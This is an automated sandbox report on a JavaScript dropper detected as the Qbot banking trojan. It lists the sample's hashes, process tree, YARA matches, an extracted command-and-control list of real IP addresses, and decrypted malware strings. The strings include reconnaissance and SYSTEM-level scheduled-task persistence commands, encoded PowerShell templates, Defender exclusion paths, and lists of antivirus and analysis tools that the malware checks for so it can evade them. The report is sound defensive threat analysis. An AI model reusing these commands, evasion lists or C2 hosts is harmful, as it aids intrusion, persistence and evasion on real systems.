Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ProjectFunding_450726_Jun01.js

Overview

General Information

Sample Name:ProjectFunding_450726_Jun01.js
Analysis ID:880006
MD5:a657553449746c482dacfe3b19119b7a
SHA1:630b815d443f8f7ef7e4c4c7c100de1cd8a7ed53
SHA256:44e029dd6210c4906a82e1f16dd5ebed434efd225dafb92fc560e6ff6d1ee948
Tags:js
Infos:

Detection

Qbot
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Qbot
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Sample uses string decryption to hide its real strings
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
Java / VBScript file with very long strings (likely obfuscated code)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Launches processes in debugging mode, may be used to hinder debugging
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • wscript.exe (PID: 3100 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ProjectFunding_450726_Jun01.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • msiexec.exe (PID: 5424 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • rundll32.exe (PID: 7228 cmdline: rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 7252 cmdline: rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • wermgr.exe (PID: 7284 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • wscript.exe (PID: 7236 cmdline: wscript.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
QakBot, qbotQbotQBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.
  • GOLD CABIN
https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot
{"Bot id": "obama266", "Campaign": "1685611378", "Version": "404.1346", "C2 list": ["24.234.220.88:990", "70.28.50.223:2078", "96.56.197.26:2083", "103.123.223.133:443", "83.249.198.100:2222", "199.27.66.213:443", "90.104.151.37:2222", "94.204.202.106:443", "72.205.104.134:443", "65.95.141.84:2222", "70.28.50.223:2078", "82.131.141.209:443", "77.126.99.230:443", "71.38.155.217:443", "205.237.67.69:995", "84.215.202.8:443", "24.234.220.88:465", "76.178.148.107:2222", "116.74.163.130:443", "70.28.50.223:2087", "147.147.30.126:2222", "173.88.135.179:443", "103.140.174.20:2222", "77.86.98.236:443", "92.149.250.113:2222", "96.87.28.170:2222", "86.168.210.41:443", "176.142.207.63:443", "12.172.173.82:32101", "86.132.236.117:443", "70.50.83.216:2222", "161.142.103.187:995", "45.62.70.33:443", "12.172.173.82:465", "178.175.187.254:443", "83.110.223.61:443", "105.184.209.194:995", "41.186.88.38:443", "102.156.10.183:443", "27.109.19.90:2078", "47.205.25.170:443", "12.172.173.82:993", "76.170.252.153:995", "69.242.31.249:443", "24.234.220.88:995", "125.99.69.178:443", "79.168.224.165:2222", "75.143.236.149:443", "14.192.241.76:995", "124.122.47.148:443", "81.229.117.95:2222", "98.145.23.67:443", "114.143.176.236:443", "103.144.201.48:2078", "122.186.210.254:443", "69.160.121.6:61201", "12.172.173.82:21", "72.253.126.216:443", "75.109.111.89:443", "76.86.31.59:443", "116.120.145.170:995", "12.172.173.82:50001", "81.101.185.146:443", "201.244.108.183:995", "68.203.69.96:443", "103.139.242.6:443", "103.42.86.42:995", "85.61.165.153:2222", "76.16.49.134:443", "125.99.76.102:443", "184.182.66.109:443", "70.28.50.223:32100", "50.68.204.71:993", "85.57.212.13:3389", "41.227.190.59:443", "70.28.50.223:3389", "31.53.29.235:2222", "89.79.229.50:443", "50.68.186.195:443", "47.199.241.39:443", "93.147.235.8:443", "75.141.227.169:443", "45.243.142.31:995", "79.92.15.6:443", "85.104.105.67:443", "89.129.109.27:2222", "86.176.83.44:2222", "24.234.220.88:993", "89.32.156.5:995", "12.172.173.82:22", "103.101.203.177:443", "70.28.50.223:2083", "98.187.21.2:443", "70.49.205.198:2222", "96.56.197.26:2222", "92.9.45.20:2222", "86.195.14.72:2222", "172.115.17.50:443", "100.4.163.158:2222", "80.12.88.148:2222", "213.64.33.92:2222", "113.11.92.30:443", "78.192.109.105:2222", "47.34.30.133:443", "122.184.143.86:443", "198.2.51.242:993", "165.120.169.171:2222", "88.126.94.4:50000", "82.125.44.236:2222", "117.195.17.148:993", "147.219.4.194:443", "80.167.196.79:443", "92.154.17.149:2222", "184.181.75.148:443", "95.45.50.93:2222", "84.35.26.14:995", "201.143.215.69:443", "12.172.173.82:2087", "50.68.204.71:443", "64.121.161.102:443"]}
SourceRuleDescriptionAuthorStrings
00000004.00000002.385257108.000000000047A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
    00000004.00000002.385365210.0000000000E10000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
      decrypted.memstrJoeSecurity_QbotYara detected QbotJoe Security
        SourceRuleDescriptionAuthorStrings
        4.2.rundll32.exe.570000.1.unpackMAL_QakBot_ConfigExtraction_Feb23QakBot Config Extractionkevoreilly
        • 0xec55:$params: 8B 7D 08 8B F1 57 89 55 FC E8 84 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9
        • 0xa87b:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
        4.2.rundll32.exe.570000.1.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
          4.2.rundll32.exe.490910.0.raw.unpackMAL_QakBot_ConfigExtraction_Feb23QakBot Config Extractionkevoreilly
          • 0xec55:$params: 8B 7D 08 8B F1 57 89 55 FC E8 84 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9
          • 0xa87b:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
          4.2.rundll32.exe.490910.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
            4.2.rundll32.exe.490910.0.unpackMAL_QakBot_ConfigExtraction_Feb23QakBot Config Extractionkevoreilly
            • 0xe055:$params: 8B 7D 08 8B F1 57 89 55 FC E8 84 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9
            • 0x9c7b:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
            Click to see the 1 entries
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000004.00000002.385257108.000000000047A000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Qbot {"Bot id": "obama266", "Campaign": "1685611378", "Version": "404.1346", "C2 list": ["24.234.220.88:990", "70.28.50.223:2078", "96.56.197.26:2083", "103.123.223.133:443", "83.249.198.100:2222", "199.27.66.213:443", "90.104.151.37:2222", "94.204.202.106:443", "72.205.104.134:443", "65.95.141.84:2222", "70.28.50.223:2078", "82.131.141.209:443", "77.126.99.230:443", "71.38.155.217:443", "205.237.67.69:995", "84.215.202.8:443", "24.234.220.88:465", "76.178.148.107:2222", "116.74.163.130:443", "70.28.50.223:2087", "147.147.30.126:2222", "173.88.135.179:443", "103.140.174.20:2222", "77.86.98.236:443", "92.149.250.113:2222", "96.87.28.170:2222", "86.168.210.41:443", "176.142.207.63:443", "12.172.173.82:32101", "86.132.236.117:443", "70.50.83.216:2222", "161.142.103.187:995", "45.62.70.33:443", "12.172.173.82:465", "178.175.187.254:443", "83.110.223.61:443", "105.184.209.194:995", "41.186.88.38:443", "102.156.10.183:443", "27.109.19.90:2078", "47.205.25.170:443", "12.172.173.82:993", "76.170.252.153:995", "69.242.31.249:443", "24.234.220.88:995", "125.99.69.178:443", "79.168.224.165:2222", "75.143.236.149:443", "14.192.241.76:995", "124.122.47.148:443", "81.229.117.95:2222", "98.145.23.67:443", "114.143.176.236:443", "103.144.201.48:2078", "122.186.210.254:443", "69.160.121.6:61201", "12.172.173.82:21", "72.253.126.216:443", "75.109.111.89:443", "76.86.31.59:443", "116.120.145.170:995", "12.172.173.82:50001", "81.101.185.146:443", "201.244.108.183:995", "68.203.69.96:443", "103.139.242.6:443", "103.42.86.42:995", "85.61.165.153:2222", "76.16.49.134:443", "125.99.76.102:443", "184.182.66.109:443", "70.28.50.223:32100", "50.68.204.71:993", "85.57.212.13:3389", "41.227.190.59:443", "70.28.50.223:3389", "31.53.29.235:2222", "89.79.229.50:443", "50.68.186.195:443", "47.199.241.39:443", "93.147.235.8:443", "75.141.227.169:443", "45.243.142.31:995", "79.92.15.6:443", "85.104.105.67:443", "89.129.109.27:2222", "86.176.83.44:2222", "24.234.220.88:993", "89.32.156.5:995", "12.172.173.82:22", "103.101.203.177:443", "70.28.50.223:2083", "98.187.21.2:443", "70.49.205.198:2222", "96.56.197.26:2222", "92.9.45.20:2222", "86.195.14.72:2222", "172.115.17.50:443", "100.4.163.158:2222", "80.12.88.148:2222", "213.64.33.92:2222", "113.11.92.30:443", "78.192.109.105:2222", "47.34.30.133:443", "122.184.143.86:443", "198.2.51.242:993", "165.120.169.171:2222", "88.126.94.4:50000", "82.125.44.236:2222", "117.195.17.148:993", "147.219.4.194:443", "80.167.196.79:443", "92.154.17.149:2222", "184.181.75.148:443", "95.45.50.93:2222", "84.35.26.14:995", "201.143.215.69:443", "12.172.173.82:2087", "50.68.204.71:443", "64.121.161.102:443"]}
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: error res='%s' err=%d len=%u
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: netstat -nao
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: runas
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: ipconfig /all
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: net localgroup
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: nltest /domain_trusts /all_trusts
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Microsoft
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SELF_TEST_1
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: p%08x
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Self test FAILED!!!
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Self test OK.
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: /t5
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: whoami /all
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: cmd
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: microsoft.com,google.com,cisco.com,oracle.com,verisign.com,broadcom.com,yahoo.com,xfinity.com,irs.gov,linkedin.com
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: ERROR: GetModuleFileNameW() failed with error: ERROR_INSUFFICIENT_BUFFER
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: route print
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: .lnk
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: "%s\system32\schtasks.exe" /Create /ST %02u:%02u /RU "NT AUTHORITY\SYSTEM" /SC ONCE /tr "%s" /Z /ET %02u:%02u /tn %s
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: arp -a
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %s "$%s = \"%s\"; & $%s"
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: net share
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: cmd.exe /c set
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Self check
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %u;%u;%u;
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: /c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: ProfileImagePath
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: at.exe %u:%u "%s" /I
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: ProgramData
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Self check ok!
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: powershell.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: qwinsta
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: net view
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%s
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Component_08
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Start screenshot
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: schtasks.exe /Delete /F /TN %u
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: appidapi.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %s \"$%s = \\\"%s\\\\; & $%s\"
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: c:\ProgramData
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Component_07
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: powershell.exe -encodedCommand %S
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: ERROR: GetModuleFileNameW() failed with error: %u
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: powershell.exe -encodedCommand
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SoNuce]ugdiB3c[doMuce2s81*uXmcvP
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: \System32\WindowsPowerShell\v1.0\powershell.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: error res='%s' err=%d len=%u
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: netstat -nao
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: runas
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: ipconfig /all
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %u.%u.%u.%u.%u.%u.%04x
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\explorer.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SystemRoot
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: cscript.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: MBAMService.exe;mbamgui.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\xwizard.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\wermgr.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: C:\INTERNAL\__empty
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: .dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Win32_PhysicalMemory
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: ALLUSERSPROFILE
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: image/jpeg
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: LocalLow
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: displayName
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: shlwapi.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\WerFault.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: CommandLine
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: kernel32.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SubmitSamplesConsent
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: 1234567890
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: wbj.go
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\wextract.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Win32_DiskDrive
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: vkise.exe;isesrv.exe;cmdagent.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: System32
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Name
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\WerFault.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: WRSA.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: c:\\
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SpyNetReporting
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: FALSE
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: aswhookx.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Packages
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SonicWallClientProtectionService.exe;SWDash.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: application/x-shockwave-flash
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: RepUx.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\mspaint.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Winsta0
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\wermgr.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: avp.exe;kavtray.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: root\SecurityCenter2
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: MsMpEng.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: userenv.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: csc_ui.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: \\.\pipe\
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: pstorec.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: NTUSER.DAT
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: from
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\sethc.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: netapi32.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\Utilman.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: gdi32.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: setupapi.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SELECT * FROM Win32_Processor
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: iphlpapi.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Caption
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: CrAmTray.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Win32_ComputerSystem
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: user32.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: xagtnotif.exe;AppUIMonitor.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\dxdiag.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: \sf2.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\grpconv.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: egui.exe;ekrn.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Software\Microsoft
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %S.%06d
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: bcrypt.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SELECT * FROM AntiVirusProduct
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\SndVol.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\explorer.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\Utilman.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: wtsapi32.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\xwizard.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: shell32.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: TRUE
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Win32_Bios
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SELECT * FROM Win32_OperatingSystem
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\mobsync.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: c:\hiberfil.sysss
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: */*
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: abcdefghijklmnopqrstuvwxyz
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: ByteFence.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: type=0x%04X
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: snxhk_border_mywnd
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: ROOT\CIMV2
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: https
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\explorer.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: fshoster32.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: kernelbase.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: regsvr32.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %s\system32\
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Win32_Process
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: rundll32.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: LOCALAPPDATA
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: cmd.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: APPDATA
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: select
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: .exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: mcshield.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: advapi32.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: ws2_32.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: .cfg
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Win32_Product
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: WQL
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: wininet.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: LastBootUpTime
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: S:(ML;;NW;;;LW)
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: urlmon.dll
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Create
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Win32_PnPEntity
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\grpconv.exe
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: Initializing database...
            Source: 4.2.rundll32.exe.570000.1.unpackString decryptor: %SystemRoot%\System32\SearchIndexer.exe
